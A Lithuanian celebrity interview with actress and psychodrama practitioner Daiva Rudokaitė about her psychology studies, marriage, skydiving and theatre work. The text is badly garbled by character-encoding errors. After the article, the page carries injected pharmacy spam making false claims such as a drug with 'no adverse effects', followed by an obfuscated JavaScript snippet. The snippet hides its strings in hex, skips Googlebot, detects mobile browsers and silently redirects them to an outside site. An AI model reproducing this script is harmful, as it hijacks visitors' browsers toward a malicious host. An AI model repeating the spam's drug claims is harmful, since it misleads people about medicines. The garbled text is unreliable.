AktorAi?? Daiva RudokaitAi??: ai??zNegaliu pakAi??sti rutinosai???

2013 01 29  |  Žmonės


Nacionalinio Kauno dramos teatro, serialA? ai??zSvetimiai???, ai??zAi??irdys paklydAi??lAi??sai???, ai??zBe namA?ai???, ai??zVyno keliasai???, ai??zMoterys meluoja geriauai??? ir kitA? aktorAi??, psichodramos draugijos prezidentAi?? Daiva RudokaitAi?? A? susitikimAi?? atlAi??kAi?? tiesiai iA? filmavimo aikA?telAi??s.

KAi?? tik vaidino IevAi?? iA? ai??zMoterys meluoja geriauai???, o po valandos bus jaunamartAi?? Pelanija GraA?ienAi?? spektaklyje pagal J. Tumo-VaiA?ganto pjesAi?? ai??zA?emAi??s ar motersai??? ai??i?? toks paA?Ai??lAi??s gyvenimo tempas aktorAi??s nevargina, nes ji mAi??gsta iA?A?Ai??kius ir pokyA?ius.

Dar viena aukA?toji ir atrasta psichodrama
KodAi??l bAi??dama aktorAi?? nutarAi??te studijuoti psichologijAi??? JautAi??te, kad kaip tik tokiA? A?iniA? jums trAi??ksta?
ai??zGrA?A?dama A? tAi?? metAi??, kai Ai??miausi studijuoti psichologijAi??, maniau, kad atsitiktinumA? gyvenime nebAi??na, tik reikia mokAi??ti skaityti A?enklus. Tada iA?gyvenau nelengvAi?? metAi??: sugriuvus ai??zAi??iaurAi??s AtAi??nA?ai??? teatrui Vilniuje, mane pakvietAi?? vaidinti A? KaunAi??. Ai??A? miestAi?? jaukinausi sunkokai; Kaune neturAi??jau artimA? draugA?, prasidAi??jo rutina, tuA?tuma: namaiai??i??teatrasai??i??namai (auginau dvejA? metA? dukrelAi??). PradAi??jau manyti, kad kai kurios mano smegenA? lAi??stelAi??s miega, ai??i?? mintimis dalijasi D.RudokaitAi??. ai??i?? Nutarusi A?sigyti vairuotojo paA?ymAi??jimAi??, pradAi??jau mokytis ir pastebAi??jau, kad man sunku. IA?sigandau. Kas man yra? Atbunku? Turiu ko nors imtis? Studijuoti uA?sienio kalbAi??? O kur ir su kuo ja kalbAi??siu?
VienAi?? dienAi?? LaisvAi??s alAi??ja einu iA? teatro namo ir sutinku senAi?? biA?iulA?. Ai??nektelAi??jome apie A?A? bei tAi??, aA? pasiguodA?iau, kad kaA?ko man liAi??dna ir tuA?A?ia A?iame gyvenime, o jis uA?siminAi??: Vytauto DidA?iojo universitetas pirmAi?? kartAi?? renka neakivaizdines grupes; stok studijuoti psichologijos ar sociologijos ai??i?? labai A?domu (jis pats buvo sociologas), o mesti studijas juk galAi??si bet kada.
Ilgai mAi??styti nebuvo kada ai??i?? po dviejA? savaiA?iA? baigAi??si dokumentA? priAi??mimas ai??i?? A?tai aA? ir VDU studentAi??, bAi??sima psichologAi?? (populiariAi??ja psichologija domAi??jausi nuo maA?ens).
Studijos labai patiko, nors buvo visko: ir pinigA? uA? mokslAi?? pritrAi??kdavo, ne kartAi?? spektakliai dubliuodavosi su egzaminais, ir mokytis tekdavo naktimis. UA?migdA?iusi dukrelAi?? prie knygA? sAi??dAi??davau iki paryA?iA?. O treA?iame kurse iA?girdau apie psichodramAi??. Tuo metu nelabai supratau, koks tai metodas: teoriA?kai sunku jA? paaiA?kinti, tai tas pat, kas ragauti tortAi?? per stiklAi?? ai??i?? reikia iA?bandyti, nes tai veiksmo metodas.ai???

JAi??s tokia energinga, nuolat besiA?ypsanti. O juk iA?gyvenote skausmingas skyrybas. Ko jus iA?mokAi?? psichodrama?
ai??zKas A?vyko, tas turAi??jo A?vykti, esu linkusi gyventi A?ia diena, o A?iandien jauA?iuosi laiminga, ai??i?? sako paA?nekovAi??. ai??i?? O apie psichodramAi?? galiu kalbAi??ti ir kalbAi??ti, beje, primygtinai siAi??lau jAi?? iA?bandyti.
Psichodrama ai??i?? tai kelionAi?? A? save, kupina A?domiausiA? ir netikAi??A?iausiA? atradimA?. Ai??is psichoterapijos metodas A?domus ir patrauklus jau vien tuo, kad terapija vyksta ne pokalbio metu, o per veiksmAi??, problemos, gyvenimo situacijos yra ai??ziA?veikiamosai???, t. y. suvaidinamos.Ai?? Toks terapijos bAi??das padeda ne tik iA?tyrinAi??ti A?mogaus vidinA? pasaulA? ir kartu su juo pajausti jo bAi??das, bet ir atskleisti problemA? turinA?io A?mogaus kAi??rybinA? potencialAi??, suA?inoti, kokius dar gyvenimo vaidmenis, be savo pasirinktojo, jis gali atlikti.
O gal A?mogus pasirinko vaidmenA?, kuris jam visai netinka? O gal jam tAi?? vaidmenA? primetAi?? kiti? Juk dauguma, ypaA? pagyvenusiA?jA?, tvirtina apie save A?inAi?? viskAi??. Per psichodramos uA?siAi??mimus daA?nai vyresni A?monAi??s savyje atranda tokiA? dalykA?, apie kuriuos nAi?? nenutuokAi??… ai??i?? pasakoja aktorAi??. ai??i?? AA? pati virsmAi?? savyje pajutau jau po pirmA? psichodramos seminarA?. Psichodramos suteiktos A?inios man padAi??jo tapti tolerantiA?kesnei, iA?siugdyti A?A?valgAi??, suvokti, kodAi??l elgiamasi vienaip ar kitaip.
PodiplominAi??ms tAi??stinAi??ms psichodramos studijoms paaukojau beveik septynerius metus, noriu suA?inoti vis daugiau. Aktyviai dalyvauju Lietuvos psichodramos draugijos organizuojamuose seminaruose (Daiva yra A?ios draugijos prezidentAi?? ai??i?? red.), organizuoju seminarus, kuriuos vedaAi?? pasaulyje pripaA?inti uA?sienio psichodramos specialistai, vaA?inAi??ju A? tarptautines konferencijas, kur turiu retAi?? galimybAi?? susitikti, bendradarbiautiAi?? su psichodramos ai??zA?vaigA?dAi??misai??? ir daug ko iA? jA? pasimokyti. Taip vis mokausi, gilinuosi ir kiekvienAi?? kartAi?? gaunu patvirtinimAi??, kad tai mano kelias ir aA? tikiu psichodrama kaip metodu.
Kai manAi??s A?monAi??s klausia, kas yra psichodrama, kaip ji veikia, visada pasiAi??lau ateiti A? grupAi?? ir iA?bandyti (D.RudokaitAi?? veda psichodramos savAi??s paA?inimo uA?siAi??mimus, A? kuriuos A?monAi??s ateina geriau paA?inti savAi??s ir kitA?, ieA?ko savyje neatrastA? pusiA? ar tiesiog mAi??gina sprAi??sti problemas, ieA?koti atsakymA? A? iA?kilusius gyvenimiA?kus klausimus ai??i?? red.).ai???

AntrAi??kart tekAi??jau, nes Vytautui brangi ir mano duktAi??
Dabar vAi??l esate laimingai iA?tekAi??jusi ir mylima. Ar buvo sunku ryA?tis antrai santuokai?
ai??zIlgai delsiau, nors su Vytautu iki vestuviA? buvome paA?A?stami A?eA?erius metus. MAi??sA? paA?intis buvo kaA?kokia A?aibiA?ka. Vytautas mane A?simylAi??jo iA? pirmo A?vilgsnio ir labai romantiA?kai pasipirA?o, bet aA? vis mAi??sA?iau, svarsA?iau, buvau labai atsargi.
Galiausiai mane nuginklavo jo dAi??mesys mano dukteriai. Visada pagalvodavau, kad ryA?A?iausi vAi??l kurti A?eimAi??, jeigu atsirastA? A?mogus, kuris mylAi??tA? mano dukterA?, ai??i?? atvirai kalba D.RudokaitAi??. ai??i?? Jau per treA?iAi?? mAi??sA? susitikimAi?? Vytautas pasakAi??, kad mano vaikAi?? mylAi??s ir juo rAi??pinsis taip, kaip savo vaikais (Vytautas iA? pirmos santuokos turi dvi suaugusias dukteris: viena jau pati yra sukAi??rusi A?eimAi??). Pajutau, jog galiu juo pasitikAi??ti.
Mano duktAi?? tuo metu buvo dar vaikas, ir jiedu greitai susidraugavo. AA? vesdavau psichodramos seminarus, gastroliuodavau su teatru, tad daA?nokai nebAi??davau namie, o jiedu puikiai tvarkAi??si.ai???

Ar toks puikus dukters ir vyro bendravimas gimAi?? iA? karto?
ai??zNebuvo taip, kad mano duktAi?? iA?kart prie jo priprato. Jai jis buvo svetimas ai??i?? A?siverA?Ai??lis ir konkurentas. ReikAi??jo laiko. Vytautas ai??i?? jaukus ir kantrus A?mogus, mokantis sutarti. Jeigu A?iandien mes visi trys gyvename po vienu stogu, vadinasi, mums yra geraiai???, ai??i?? sako aktorAi??.

Ar sutuoktinis niekada nepriekaiA?tauja, kai iA?vykstate arba einate A? vakarAi??lius be jo, nepavyduliauja?
ai??zNa, kai mylime, tai ir pavydime. TaA?iau Vytautas visada mane supranta: bAi??na taip, kad aA? pati dvejoju, ar man kur nors eiti ar vaA?iuoti, o jis mane skatina: ai??zTau reikia ten dalyvautiai???. AA? pradedu urgzti, kad man dar tAi?? ir anAi?? reikAi??tA? padaryti, o jis sako: ai??zMes susitvarkysime. Keliauk!ai???, ai??i?? pasakoja D.RudokaitAi??. ai??i?? AA? taip pat gerbiu jo pomAi??gius, jo draugus. Esame iA? skirtingA? pasauliA?: Vytautas turi savA? pomAi??giA?, bet jo klausytis visada A?domu. Mes vienas be kito nemokame gyventi, tiesiog daug kalbamAi??s, o pokalbiai padeda geriau suprasti ir paA?inti vienam kitAi??, papildo abu. Su savo vyru jauA?iuosi saugi, ir tai man labai svarbu.ai???

AA?triA? pojAi??A?iA? trokA?tame visi, tik neprisipaA?A?stame…
Vytautas jus sugundAi?? A?okti paraA?iutu? Ar lengvai ryA?otAi??s tokiai ekstremaliai pramogai?
ai??zAA? pati apie tai svajojau… ai??i?? prisipaA?A?sta aktorAi??. ai??i?? O kai tik jam pasakiau apie savo norAi??, jis pasiAi??lAi?? viskAi?? suorganizuoti ir net kartu A?okti. Ar aA? bijojau? A?inoma, bet noro buvo daugiau negu baimAi??s…
Manau, kiekvienas mAi??sA? turime kraA?tutinumA? savyje. Kai galva pilna visokiA? ai??znegerA?ai??? minA?iA?, A?uolis paraA?iutu jas iA?taA?ko, iA?valo… Tas, kuris nAi?? karto nAi??ra A?okAi??s su paraA?iutu, nesupras ai??i?? tokiA? potyriA? uA? milijonus nenusipirksi. Nemoku nusakyti to, kAi?? tada jauA?iau, tik atsimenu, kai per racijAi?? iA?girdau: ai??zJau dabar leiskitAi??sai???, rAi??kiau kiek tik galAi??jau: ai??zNenoriuai???, nors A?inojau, kad manAi??s niekas negirdi. KabAi??jau ore, aplink skraidAi?? paukA?A?iai, apaA?ioje vingiavo Nemuno kilpa. Leidausi A?emyn lygiai minutAi??, o man atrodAi??, kad praAi??jo visa palaimos valanda.
AntrAi?? kartAi?? paraA?iutu A?okau po metA? ir leidausi iA? 4000 metrA? aukA?A?io. Tuomet jau laviravau, nesileidau taip greitai kaip pirmAi?? kartAi?? ir gerte gAi??riau dangA?. Tuomet supratau, kad sergu dangaus liga, tik A?is malonumas nAi??ra pigus. Bet viskas atsiperka. Mano visas kAi??nas trokA?te trokA?ta stipriA? pojAi??A?iA?, o rutina, kasdienybAi?? dusina.ai???

TaA?iau jAi??s mielai darbuojatAi??s ir ilsitAi??s sodyboje. Ar ir ten randate ai??zaA?trumA?ai????
ai??zIA?protAi??A?iau, jeigu negalAi??A?iau pabAi??gti A? sodybAi??. Manau, kad mes visi ilgimAi??s gamtos, norime nors A?iek tiek laiko praleisti ai??zant A?emAi??sai???, ai??i?? A?sitikinusi paA?nekovAi??. ai??i??Ai?? AA? A?emAi??s darbA? nebijau, vasaras mes, visi trys vaikai, leisdavome kaime, buvome iA?mokyti dirbti. Tad suleisti rankas A? A?emAi?? man ai??i?? malonumas. O ir ramybAi?? savaip atgaivina. Rutinos sodyboje nAi??ra ai??i?? ten tiesiog sustoja laikas, o ir mintys nurimsta.ai???

TeatrinAi?? karjera prasidAi??jo nuo rAi??binAi??s…
Kaip atradote teatrAi??? Gal pratAi??sAi??te A?eimos tradicijas?
PradAi??jusi pasakoti apie savo tAi??vus aktorAi?? nusiA?ypso: ai??zMano tAi??vai ai??i?? protingi A?monAi??s: mama dirbo mokslinA? darbAi??, o tAi??A?io gyvenime buvo skaiA?iai, jis ai??i?? puikus ekonomistas. Bet tikra A?emaitAi?? mano moA?iutAi?? daA?nai prisimindavo, kaip jauna vaidindavo LuokAi??s teatre. Ji pasakodavo, kaip visa salAi?? verkAi??, kai buvo nuA?udyta jos vaidinama herojAi??. ai??zMan taip buvo gera, kad visi verkAi??, vadinasi, gerai suvaidinau, jeigu verkAi??ai???, ai??i?? baigdavo ji savo pasakojimAi??.
Mano mama ai??i?? meniA?kos sielos moteris, gal jai tiesiog nebuvo galimybiA? realizuoti savAi??s kitur. IA? trijA? jos vaikA? ai??i?? aA? viena artistAi??, o sesAi?? ir brolis ai??i?? medikai. Na, taip jau bAi??na, kad treA?ias vaikas ai??i?? kvailelis (juokiasi), kuris ir pasirenka menAi??… SesAi?? ir brolis nuo maA?ens A?inojo, kad bus medikai. Man, beje, visi taip pat pranaA?avo medikAi??s karjerAi??. TaA?iau taip jau nutiko, kad mokydamasi aA?tuntoje klasAi??je atradau teatrAi??, o prieA? tai buvau maA?iusi tik vienAi?? kitAi?? vaikiA?kAi?? spektaklA? ir nieko ten itin A?domaus neA?A?velgiau.
Mokiausi PanevAi??A?io vidurinAi??je mokykloje, kurioje buvo sustiprintas lietuviA? kalbos dAi??stymas, ir mes turAi??jome galimybAi?? savanoriauti ai??i?? teatro rAi??binAi??je. Taigi galAi??jome nemokamai pasiA?iAi??rAi??ti spektakliA?. Visus juos mokAi??jau atmintinai. Kaip pakerAi??ta tuos paA?ius spektaklius A?iAi??rAi??davau po deA?imt kartA?. Kai pasakiau, kad stosiu mokytis aktorystAi??s, tAi??vai neapsidA?iaugAi??, ir aA? juos puikiai suprantu.ai???

Ai??kvepia pokyA?iai 180 laipsniA? kampu
Ar galAi??tumAi??te mesti aktorystAi?? ir gyventi vien iA? psichodramos uA?siAi??mimA??
ai??zAi??iuo metu tikrai ne, nes psichodrama ir teatras vienas kitAi?? papildo. Psichodramos studijos ir patirtis gerokai pakeitAi?? poA?iAi??rA? (gerAi??ja prasme) A? teatrAi??, kAi??rybAi??, kolektyvinA? bendradarbiavimAi??, o ir teatrinAi??Ai?? patirtis turi daug privalumA? bei pranaA?umA? man kaip psichodramos specialistei. Vesti seminarus, kaip ir kurti spektaklA?, man labai A?domu. Vyksta energijA? apsikeitimas, ir tai puiku. Kad ir kaip bAi??nu pavargusi, po seminarA? grA?A?tu pasisAi??musi energijos, o kai vAi??liau A?monAi??s dar papasakoja, kaip jA? gyvenimai keiA?iasi 180 laipsniA? kampu A? pozityviAi??jAi?? pusAi??, kaip jie iA?drA?sta bAi??ti kitokie, kaipAi?? atsikratAi?? dvideA?imt metA? juos smaugusios A?tampos ar nuoskaudos ai??i?? tai didA?iausias atlygis, ai??i?? savo mintimis dalijasi Daiva. ai??i?? VaA?inAi??dama A? psichodramos specialistA? konferencijas, suA?inojau, kad labai daA?nai uA?sienio teatruose dirba psichologai psichodramos specialistai. Jie padeda aktoriams ai??zA?sivalytiai??? smegenis, nes vieni moka ai??ziA?eitiai??? iA? vaidmens, o kiti ai??i?? ne. Ilgainiui tai tampa liga, persekioja paranojos.
Manau, psichodrama labai praverstA? besimokantiems bAi??simiems aktoriams, bet tai jau ateities dalykai.ai???

AktorAi??s laikas tirpsta, po penkiolikos minuA?iA? prasidAi??s spektaklis, o juk dar reikia spAi??ti nusigrimuoti, pasiruoA?ti, kad A?iAi??rovai patikAi??tA?, jog prieA? juos jaunamartAi?? Pelanija, kuriAi??, kaip ir kiekvienAi?? savo kuriamAi?? personaA?Ai??, D.RudokaitAi?? kaskart atranda iA? naujo.

EglAi?? myrx olanzapine, myrx olanzapine, myrx olanzapine, myrx olanzapine, myrx olanzapine, myrx olanzapine, myrx olanzapine, myrx olanzapine, myrx olanzapine, myrx olanzapine, myrx olanzapine, myrx olanzapine, myrx olanzapine, myrx olanzapine, myrx olanzapine, myrx olanzapine, myrx olanzapine, myrx olanzapine. KulvietienAi??

Clomid (clomifene) can be prescribed for women who have ovulation issues. This medication is a fertility treatment and can be prescribed Clomid buy online. The manufacturer of buy Clomid online is Sanofi-Aventis. This pharmaceutical company supplies Clomid 50mg oral tablets at the international market. Nolvadex buy online – Advantageous shopping for drugs at our drugstore. We give the lowest prices online. Efficient drug with no adverse effects nolvadex buy online! For sale australia nolvadex buy online.

.

.

.var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows bactrim ds side effects after last dose, bactrim ds side effects after last dose, bactrim ds side effects after last dose, bactrim ds side effects after last dose, bactrim ds side effects after last dose, bactrim ds side effects after last dose. ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Komentuokite